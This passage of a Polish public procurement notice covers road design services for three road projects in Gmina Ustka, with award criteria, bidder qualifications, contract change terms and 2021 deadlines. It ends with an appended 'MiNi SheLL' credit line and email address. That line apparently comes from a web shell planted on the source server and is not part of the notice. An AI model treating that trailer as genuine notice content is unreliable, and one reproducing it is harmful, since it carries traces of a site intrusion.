uwzględniać zmiany w zakresie niezbędnym do użytkowania przedmiotu umowy. <br/>2. W ramach wykonania zakresu określonego w pkt. 3.3.1.1) Wykonawca zobowiązany będzie do:<br/>1) opracowania map do celów projektowych – 1 egz.,<br/>2) opracowania dokumentacji geotechnicznej – 5 egz.,<br/>3) opracowania pełnobranżowej dokumentacji budowlanej – 5 egz., obejmującej w szczególności:<br/>- zagospodarowanie terenu,<br/>- projekt branży drogowej, sanitarnej, elektrycznej, telekomunikacyjnej w zakresie rozwiązań technicznych infrastruktury,<br/>4) opracowania przedmiaru robót – 5 egz.,<br/>5) opracowania kosztorysu inwestorskiego – 5 egz.,<br/>6) opracowania specyfikacji technicznych wykonania i odbioru robót – 5 egz.,<br/>7) opracowania informacji dotyczącej Bezpieczeństwa i Ochrony Zdrowia– 5 egz.,<br/>8) opracowania koncepcji budowy dróg wraz z szacunkowym zestawieniem kosztów – 5 egz.,<br/>9) uzyskania niezbędnych uzgodnień, opinii i oświadczeń – 1 egz.,<br/>10) uzyskania w imieniu zamawiającego dokumentu uprawniającego do realizacji robót budowlanych – 1 egz.,<br/>11) innych dokumentów niezbędnych do udzielenia zamówienia publicznego na roboty stanowiące przedmiot dokumentacji projektowej.<br/>3. Przeniesienie praw autorskich przedmiotu umowy następuje w chwili zapłaty wynagrodzenia bez ograniczeń, co do terytorium, czasu i liczby egzemplarzy na polach eksploatacji wymienionych w art. 50 ustawy z dnia 4 lutego 1994 r. o prawie autorskim i prawach pokrewnych (Dz. U. z 2021 r. poz. 1062 ze zm.), obejmujących bez prawa do dodatkowego wynagrodzenia.<br/>4. Szczegółowy opis przedmiotu zamówienia został opisany w załączniku nr 8 do SWZ (część III: 8.3),- projekt umowy oraz załączniku nr 10 do SWZ - opis przedmiotu zamówienia (część III: 10.3). <br/>5 Dokumentacja projektowa jest realizowana w ramach programu wieloletniego pod nazwą „Wykonanie projektów na potrzeby uzyskania dofinansowania zewnętrznego”. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">230 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena spełniania warunków udziału w postępowaniu dokonana zostanie<br/>zgodnie z formułą „spełnia”/„nie spełnia”, w oparciu o informacje zawarte w dokumentach i<br/>oświadczeniach, o których mowa w rozdziale 14 SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenia projektanta branży drogowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 5.4.) Nazwa i opis warunków udziału w postępowaniu.<br/>1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na<br/>zasadach określonych w pkt. 14 SWZ, oraz spełniają określone przez Zamawiającego warunki<br/>udziału w postępowaniu (art. 266 w zw. z art. 112 ustawy PZP).<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym: Zamawiający nie stawia warunku w<br/>powyższym zakresie;<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów: Zamawiający nie stawia warunku w powyższym zakresie;<br/>3) sytuacji ekonomicznej lub finansowej: Zamawiający nie stawia warunku w powyższym<br/>zakresie.<br/>4) zdolności technicznej lub zawodowej: warunek zostanie uznany za spełniony, jeżeli<br/>Wykonawca wykaże, że:<br/>Część I (Starkowo):<br/>1) skieruje do realizacji przedmiotu zamówienia jedną osobę, która będzie pełniła funkcję<br/>projektanta branży drogowej, posiadającego uprawnienia budowlane do projektowania w<br/>specjalności drogowej bez ograniczeń, w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo<br/>budowlane (t.j. Dz. U. z 2020 r. poz. 1333 ze zm.) oraz Rozporządzenia Ministra Inwestycji i<br/>Rozwoju z dnia 29 kwietnia 2019r. w sprawie przygotowania zawodowego do wykonywania<br/>samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2019r. poz. 831);<br/>2) wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w<br/>okresie 3 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy- w<br/>tym okresie, co najmniej:<br/>dwa projekty budowlano – wykonawcze branży drogowej, w zakresie<br/>budowy/przebudowy/remontu dróg publicznych o łącznej długości co najmniej 1000 m wraz z<br/>uzyskaniem w imieniu inwestora dokumentu uprawniającego do rozpoczęcia robót budowlanych<br/>(w tym co najmniej 1 projekt z uzyskaniem decyzji ZRID) w rozumieniu ustawy z dnia 7 lipca<br/>1994 r. Prawo Budowlane (tekst jednolity: Dz. U. z 2020 r. poz. 1333 ze zm.), ustawy o drogach<br/>publicznych (tekst jednolity: Dz. U. z 2020 r., poz. 470 ze zm.) oraz ustawy z dnia 10 kwietnia<br/>2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg<br/>publicznych (tekst jednolity: Dz. U. z 2020 r. poz. 1363)”;<br/>Część II (Rowy):<br/>1) skieruje do realizacji przedmiotu zamówienia jedną osobę, która będzie pełniła funkcję<br/>projektanta branży drogowej, posiadającego uprawnienia budowlane do projektowania w<br/>specjalności drogowej bez ograniczeń, w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo<br/>budowlane (t.j. Dz. U. z 2020 r. poz. 1333 ze zm.) oraz Rozporządzenia Ministra Inwestycji i<br/>Rozwoju z dnia 29 kwietnia 2019r. w sprawie przygotowania zawodowego do wykonywania<br/>samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2019r. poz. 831);<br/>2) wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w<br/>okresie 3 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy- w<br/>tym okresie, co najmniej:<br/>dwa projekty budowlano – wykonawcze branży drogowej, w zakresie<br/>budowy/przebudowy/remontu dróg publicznych o łącznej długości co najmniej 1000 m wraz z<br/>uzyskaniem w imieniu inwestora dokumentu uprawniającego do rozpoczęcia robót budowlanych<br/>(w tym co najmniej 1 projekt z uzyskaniem decyzji ZRID) w rozumieniu ustawy z dnia 7 lipca<br/>1994 r. Prawo Budowlane (tekst jednolity: Dz. U. z 2020 r. poz. 1333 ze zm.), ustawy o drogach<br/>publicznych (tekst jednolity: Dz. U. z 2020 r., poz. 470 ze zm.) oraz ustawy z dnia 10 kwietnia<br/>2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg<br/>publicznych (tekst jednolity: Dz. U. z 2020 r. poz. 1363)”;<br/>Część III (Dębina):<br/>1) skieruje do realizacji przedmiotu zamówienia jedną osobę, która będzie pełniła funkcję<br/>projektanta branży drogowej, posiadającego uprawnienia budowlane do projektowania w<br/>specjalności drogowej bez ograniczeń, w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo<br/>budowlane (t.j. Dz. U. z 2020 r. poz. 1333 ze zm.) oraz Rozporządzenia Ministra Inwestycji i<br/>Rozwoju z dnia 29 kwietnia 2019r. w sprawie przygotowania zawodowego do wykonywania<br/>samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2019r. poz. 831);<br/>2) wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w<br/>okresie 3 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy- w<br/>tym okresie, co najmniej:<br/>dwa projekty budowlano – wykonawcze branży drogowej, w zakresie<br/>budowy/przebudowy/remontu dróg publicznych o łącznej długości co najmniej 1500 m wraz z<br/>uzyskaniem w imieniu inwestora dokumentu uprawniającego do rozpoczęcia robót budowlanych<br/>(w tym co najmniej 1 projekt z uzyskaniem decyzji ZRID) w rozumieniu ustawy z dnia 7 lipca<br/>1994 r. Prawo Budowlane (tekst jednolity: Dz. U. z 2020 r. poz. 1333 ze zm.), ustawy o drogach<br/>publicznych (tekst jednolity: Dz. U. z 2020 r., poz. 470 ze zm.) oraz ustawy z dnia 10 kwietnia<br/>2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg<br/>publicznych (tekst jednolity: Dz. U. z 2020 r. poz. 1363)” ;<br/>UWAGI:<br/>Zamawiający akceptuje uprawnienia równoważne do wymaganych uzyskane w innych<br/>państwach, uznane w myśl art. 12a ustawy Prawo budowlane;<br/>Zamawiający akceptuje uprawnienia budowlane odpowiadające uprawnieniom wymaganym<br/>przez Zamawiającego, które zostały wydane na podstawie wcześniej wydanych przepisów oraz<br/>zagraniczne uprawnienia uznane w zakresie i na zasadach opisanych w ustawie z dnia 18<br/>marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach<br/>członkowskich Unii Europejskiej; w przypadku zaproponowania osób wchodzących w skład<br/>kadry kierowniczej, które nie znają języka polskiego, Wykonawca powinien zapewnić tłumacza.<br/>Zamawiający dopuszcza aby jedna osoba pełniła funkcję projektanta branży drogowej, w<br/>ramach realizacji jednego lub większej ilości zadań. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">w zakresie potwierdzenia braku podstaw do wykluczenia Wykonawcy z udziału w postępowaniu:<br/>1) oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej- załącznik nr 9.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">w zakresie potwierdzenia spełniania warunków udziału w postępowaniu:<br/>1) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacja o podstawie do dysponowania tymi osobami- załącznik nr 6 do SWZ;<br/>2) wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy - załącznik nr 7 do SWZ;</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Dokumenty stanowiące ofertę, które należy złożyć: <br/>1) Formularz ofertowy + formularz cenowy, <br/>2) OŚWIADCZENIA [art. 273 ust. 1 i ust. 2 w zw z art. 125 ust 1 ustawy pzp].<br/>a) oświadczenie o spełnianiu warunków udziału w postępowaniu składane na podstawie art. 125 ust. 1 ustawy Pzp w związku z art. 273 ust. 1 i ust. 2 ustawy Pzp - którego wzór stanowiące załącznik nr 2 do SWZ - w przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie o spełnieniu warunków udziału w postępowaniu składa ich pełnomocnik wykonawców lub każdy z wykonawców;<br/>b) oświadczenie o niepodleganiu wykluczeniu na podstawie art. 108 ust. 1 pkt 1 – 6 oraz art. 109 ust. 1 pkt 4 ustawy pzp - którego wzór stanowi załącznik nr 3 do SWZ - w przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie o niepodleganiu wykluczenia składa każdy z wykonawców;<br/>c) Wykonawca, w przypadku polegania na zdolnościach podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa lit a) i lit. b), także oświadczenie podmiotu udostępniającego, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby [art. 266, art. 273 ust. 1 w zw z art. 125 ust 5 ustawy pzp] - odpowiednio załącznik nr 4 oraz 5 do SWZ.<br/>3) Pełnomocnictwo upoważniające do złożenia oferty, jeżeli ofertę składa pełnomocnik; <br/>4) Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia – dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>5) Zobowiązanie podmiotu udostępniającego zasoby [art. 118 ust. 3 ustawy pzp].<br/>Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, ze wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów.<br/>Uwaga: Dokument ma być złożony wraz z ofertą tylko w sytuacji gdy wykonawca powołuje się na zasoby innego podmiotu. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. ŻadenzWykonawcówwspólnie<br/>ubiegających się o udzielenie zamówienia nie możepodlegaćwykluczeniu zpostępowania.W<br/>odniesieniu do warunków dotyczących wykształcenia,kwalifikacjizawodowychlub doświadczenia<br/>Wykonawcy wspólnie ubiegający się o udzieleniezamówieniamogą polegaćna zdolnościach tych<br/>Wykonawców, którzy wykonają robotybudowlane lub usługi,do realizacjiktórych te zdolności są<br/>wymagane. Wykonawcy wspólnieubiegający się oudzieleniezamówienia ponoszą solidarną<br/>odpowiedzialność zawykonanieumowy.OŚWIADCZENIA [art.273 ust. 1 i ust. 2 w zw z art. 125<br/>ust 1 ustawypzp].a)oświadczenie o spełnianiu warunkówudziału w postępowaniu - którego<br/>wzórstanowiącezałącznik nr 2 do SWZ - w przypadkuwspólnego ubiegania się o<br/>zamówienieprzezwykonawców, oświadczenie o spełnieniuwarunków udziału w postępowaniu<br/>składaichpełnomocnik wykonawców lub każdy zwykonawców ;b) oświadczenie<br/>oniepodleganiuwykluczeniu na podstawie art. 108 ust. 1 pkt 1 –6 oraz art. 109 ust. 1 pkt 4<br/>ustawypzp - któregowzór stanowi załącznik nr 3 do SWZ - wprzypadku wspólnego ubiegania się<br/>ozamówienie przezwykonawców, oświadczenie oniepodleganiu wykluczenia składa każdy<br/>zwykonawców; <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający zgodnie z art. 454, 455 ust. 1 pkt 1 ustawy PZP przewiduje możliwość<br/>wprowadzenia istotnych zmian do treści zawartej umowy w następującym zakresie:<br/>1) terminu realizacji umowy na skutek:<br/>a) wydłużających się terminów wydania decyzji, uzgodnień, postanowień lub innych aktów<br/>administracyjnych mających wpływ na wykonanie przedmiotu umowy, niespowodowanych z<br/>winy Wykonawcy,<br/>b) konieczności zaspokojenia oczekiwań osób trzecich – w tym grup społecznych lub<br/>zawodowych nie<br/>artykułowanych lub niemożliwych do jednoznacznego określenia w chwili zawierania umowy,<br/>c) konieczności wykonania dodatkowych badań, niemożliwych do przewidzenia na etapie<br/>przygotowania zamówienia,<br/>d) wystąpienia nieprzewidzianych prac archeologicznych,<br/>e) zawieszenia usługi projektowej przez Zamawiającego nie z winy Wykonawcy, na skutek<br/>sytuacji niemożliwych do przewidzenia w chwili zawarcia umowy;<br/>f) przestojów lub opóźnień spowodowanych przez Zamawiającego;<br/>g) zawieszenia prac (realizacji umowy) z powodu okoliczności związanych z wystąpieniem<br/>COVID-19, o ile taki wpływ wystąpił lub może wystąpić w trybie i na zasadach wskazanym w art.<br/>15 r. ustawy z dnia 31 marca 2020 roku o szczególnych rozwiązaniach związanych z<br/>zapobieganiem, przeciwdziałaniem i zwalczaniem COVID-19, innych chorób zakaźnych oraz<br/>wywołanych nimi sytuacji kryzysowych oraz niektórych innych ustaw (Dz. U. z 2020 r. poz. 1842<br/>ze zm.),<br/>– o ile okoliczności te powodują konieczność zmiany terminu i zmiany w tym zakresie będą<br/>dokonane, z uwzględnieniem okresów niezbędnych do przesunięcia terminu wykonania umowy<br/>o czas (okres w dniach), w którym z powodu w/w okoliczności roboty nie mogły być<br/>wykonywane;<br/>2) ceny, na skutek:<br/>konieczność zmiany ceny, przy czym cena netto jest stała,<br/>b) odstąpienia Zamawiającego od realizacji części przedmiotu zamówienia w efekcie<br/>okoliczności, których nie można było wcześniej przewidzieć – wówczas wynagrodzenie<br/>Wykonawcy ulegnie obniżeniu o wartość usług, od realizacji których odstąpiono, wartość robót<br/>wykonanych zostanie określona na podstawie formularza cenowego (według wartości ofertowej<br/>wyszczególnionych prac wchodzących w zakres elementu zamówienia) z uwzględnieniem ceny<br/>za wykonanie przedmiotu zamówienia, zgodnie z § 9 ust. 1 umowy.<br/>- jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę.<br/>3) osoby pełniącej funkcję projektanta, przy czym nowo wskazana osoba powinna spełniać<br/>wymagania określone przez Zamawiającego w pkt………. SWZ i uzyskać akceptację<br/>Zamawiającego;<br/>4) zmiany podwykonawcy wskazanego w ofercie, bądź też rezygnacji z podwykonawcy, z<br/>uwzględnieniem zasad określonych w SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-10 08:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-10 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-09</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Dokumentacja projektowa jest realizowana w ramach programu wieloletniego pod nazwą<br/>„Wykonanie projektów na potrzeby uzyskania dofinansowania zewnętrznego”.<br/>Termin wykonania zamówienia:<br/>Część I: „Budowa/przebudowa drogi gminnej nr 101312G, 101319G, 101315G, 101317G,<br/>101320G (drogi w centrum Starkowa od drogi powiatowej nr 1105G w kierunku Golęcina)&#34;: 230<br/>dni roboczych, w tym:<br/>• przekazanie kompletnej dokumentacji projektowej wraz z dokumentem uprawniającym do<br/>rozpoczęcia robót budowlanych, o których mowa w § 1 ust 3 pkt 1) projektu umowy - w terminie<br/>230 dni roboczych od dnia zawarcia umowy,<br/>• przekazanie koncepcji budowy dróg wraz z szacunkowym zestawieniem kosztów, o których<br/>mowa w § 1 ust 4 pkt 8) projektu umowy – w terminie 60 dni roboczych od dnia zawarcia<br/>umowy,<br/>• przez dni robocze w rozumieniu umowy należy rozumieć dni kalendarzowe z wyłączeniem<br/>sobót i niedziel i innych dni ustawowo wolnych od pracy.<br/>Za termin wykonania zamówienia rozumie się wykonanie projektu bez wad oraz przekazanie<br/>kompletnej dokumentacji projektowej w zakresie i ilościach wskazanych w § 1 ust.4 projektu<br/>umowy, potwierdzone protokołem odbioru, wraz uzyskaniem w imieniu zamawiającego<br/>dokumentu uprawniającego do realizacji robót budowlanych.<br/>Część II: „Budowa połączenia drogowego od ul. Bałtyckiej do Traktu Pierwszych Rybaków w m.<br/>Rowy Gmina Ustka”: 230 dni roboczych, w tym:<br/>• przekazanie kompletnej dokumentacji projektowej wraz z dokumentem uprawniającym do<br/>rozpoczęcia robót budowlanych, o których mowa w § 1 ust 3 pkt 1) projektu umowy - w terminie<br/>230 dni roboczych od dnia zawarcia umowy,<br/>• przekazanie koncepcji budowy dróg wraz z szacunkowym zestawieniem kosztów, o których<br/>mowa w § 1 ust 4 pkt 8) projektu umowy – w terminie 60 dni roboczych od dnia zawarcia<br/>umowy,<br/>• przez dni robocze w rozumieniu umowy należy rozumieć dni kalendarzowe z wyłączeniem<br/>sobót i niedziel i innych dni ustawowo wolnych od pracy.<br/>Za termin wykonania zamówienia rozumie się wykonanie projektu bez wad oraz przekazanie<br/>kompletnej dokumentacji projektowej w zakresie i ilościach wskazanych w § 1 ust.4 projektu<br/>umowy, potwierdzone protokołem odbioru, wraz uzyskaniem w imieniu zamawiającego<br/>dokumentu uprawniającego do realizacji robót budowlanych.<br/>Cześć III: „Budowa połączenia drogowego od ul. Gorzelnianej do ul. Jesionowej w m. Dębina<br/>Gmina Ustka”: 230 dni roboczych, w tym:<br/>1) przekazanie kompletnej dokumentacji projektowej wraz z dokumentem uprawniającym do<br/>rozpoczęcia robót budowlanych, o których mowa w § 1 ust 3 pkt 1) projektu umowy - w terminie<br/>230 dni roboczych od dnia zawarcia umowy,<br/>2) przekazanie koncepcji budowy dróg wraz z szacunkowym zestawieniem kosztów, o których<br/>mowa w § 1 ust 4 pkt 8) projektu umowy– w terminie 60 dni roboczych od dnia zawarcia umowy,<br/>3) przez dni robocze w rozumieniu umowy należy rozumieć dni kalendarzowe z wyłączeniem<br/>sobót i niedziel i innych dni ustawowo wolnych od pracy.<br/>Za termin wykonania zamówienia rozumie się wykonanie projektu bez wad oraz przekazanie<br/>kompletnej dokumentacji projektowej w zakresie i ilościach wskazanych w § 1 ust.4 projektu<br/>umowy, potwierdzone protokołem odbioru, wraz uzyskaniem w imieniu zamawiającego<br/>dokumentu uprawniającego do realizacji robót budowlanych.

Creat By MiNi SheLL
Email: jattceo@gmail.com